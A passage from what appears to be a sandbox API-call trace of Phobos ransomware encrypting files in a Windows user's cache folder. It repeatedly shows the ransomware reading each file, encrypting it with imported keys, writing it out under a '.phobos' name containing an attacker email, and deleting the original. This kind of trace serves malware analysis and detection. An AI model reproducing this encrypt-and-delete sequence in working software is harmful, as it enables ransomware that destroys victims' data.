"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa329e8) returned 1 [0197.106] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.106] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1ae, lpOverlapped=0x0) returned 1 [0197.107] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1b0, dwBufLen=0x1b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1b0) returned 1 [0197.107] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1b0, lpOverlapped=0x0) returned 1 [0197.108] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b68) returned 1 [0197.108] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.108] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.108] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.108] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.108] CryptDestroyKey (hKey=0xa329e8) returned 1 [0197.108] CloseHandle (hObject=0x140) returned 1 [0197.108] CloseHandle (hObject=0x170) returned 1 [0197.108] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398")) returned 1 [0197.111] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.112] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=404) returned 1 [0197.112] CloseHandle (hObject=0x170) returned 1 [0197.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9")) returned 0x2024 [0197.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.112] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.112] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa329e8) returned 1 [0197.113] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.113] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x194, lpOverlapped=0x0) returned 1 [0197.114] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0) returned 1 [0197.114] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a0, lpOverlapped=0x0) returned 1 [0197.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b68) returned 1 [0197.115] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.115] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.115] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.115] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.115] CryptDestroyKey (hKey=0xa329e8) returned 1 [0197.115] CloseHandle (hObject=0x170) returned 1 [0197.115] CloseHandle (hObject=0x140) returned 1 [0197.116] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9")) returned 1 [0197.118] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.119] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=404) returned 1 [0197.119] CloseHandle (hObject=0x140) returned 1 [0197.119] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77")) returned 0x2024 [0197.119] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.119] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.119] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.119] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.120] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa329e8) returned 1 [0197.120] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.120] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x194, lpOverlapped=0x0) returned 1 [0197.121] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0) returned 1 [0197.121] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a0, lpOverlapped=0x0) returned 1 [0197.122] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b68) returned 1 [0197.122] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.122] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.122] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.122] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.122] CryptDestroyKey (hKey=0xa329e8) returned 1 [0197.122] CloseHandle (hObject=0x140) returned 1 [0197.122] CloseHandle (hObject=0x170) returned 1 [0197.122] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77")) returned 1 [0197.123] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.124] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=400) returned 1 [0197.124] CloseHandle (hObject=0x170) returned 1 [0197.124] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220")) returned 0x2024 [0197.124] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.124] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.124] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.125] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa329e8) returned 1 [0197.125] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.125] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x190, lpOverlapped=0x0) returned 1 [0197.126] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0) returned 1 [0197.126] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a0, lpOverlapped=0x0) returned 1 [0197.127] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b68) returned 1 [0197.127] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.127] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.127] CryptDestroyKey (hKey=0xa32b68) returned 1 [0197.127] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.127] CryptDestroyKey (hKey=0xa329e8) returned 1 [0197.127] CloseHandle (hObject=0x170) returned 1 [0197.127] CloseHandle (hObject=0x140) returned 1 [0197.127] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220")) returned 1 [0197.199] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.200] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=398) returned 1 [0197.200] CloseHandle (hObject=0x15c) returned 1 [0197.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4")) returned 0x2024 [0197.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.200] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.200] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.698] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0197.698] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.698] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x18e, lpOverlapped=0x0) returned 1 [0197.699] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0197.699] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0197.700] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0197.700] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.700] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, 